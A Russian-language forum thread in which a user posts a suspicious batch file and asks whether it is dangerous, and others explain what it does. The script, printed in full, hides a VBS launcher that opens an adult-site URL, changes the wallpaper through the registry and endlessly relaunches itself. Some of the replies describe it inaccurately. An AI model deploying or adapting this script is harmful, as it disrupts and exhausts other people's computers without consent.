Программирование и возможные вирусы
скинули бат файл не знаю чем опасен кто разбирается подскажите опасный ли он ?
@echo off
REM Открытие рабочего стола
start "" explorer.exe "%USERPROFILE%\Desktop"
:loop
echo Set objShell = CreateObject("WScript.Shell") > invis.vbs
echo strCommand = "cmd /c start """" /B ""https://ei.phncdn.com/videos/202008/31/347632731/original/(m=eaAaGwObaaaa)(mh=WM2FBdzjtDBD7J59)15.jpg""" >> invis.vbs
echo objShell.Run strCommand, 0, false >> invis.vbs
echo Set objShell = Nothing >> invis.vbs
cscript //nologo invis.vbs
del invis.vbs
REM Изменение обоев на все картинки в папке
for %%F in ("%USERPROFILE%\Pictures*") do (
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "%%F" /f
rundll32.exe user32.dll, UpdatePerUserSystemParameters
)
timeout /t 5 /nobreak > nul
start "" "%~dpnx0" REM Запускать самого себя в новом окне
goto loop
Это разумеется не вирус. Просто исполняемый файл, поскольку его сами запускаете и по своему желанию вирусом он быть не может, скорее можно назвать это трояном .
Что делает -
После запуска лезет на какой то сайт (вероятно порно, не смотрел), качает там картинку. Эту картинку прибивает в качестве обоев рабочего стола с внесением изменений в реестре. Проверяет запущен ли скрипт invis.vbs если не запущен повторяет процесс. В общем лень разбираться, ничего такого больше нет...
"мы молодые туркменские хакеры, ничего не умеем, поэтому запустите наш вирус сами..." :)
.bat НЕ может быть "вирусом" по определению!
зловредом может быть, но НЕ "вирусом".
Здравствуйте! Сам по себе он не выполняет ничего особо вредоносного, однако, судя по его содержимому, скачивает порно-картинку (а также, возможно, открывает её) и заменяет ею картинки из папки Pictures (и, возможно, картинку рабочего стола) и повторяет процедуры бесконечное количество раз.
Хто скинул то? Враги твои?
вирус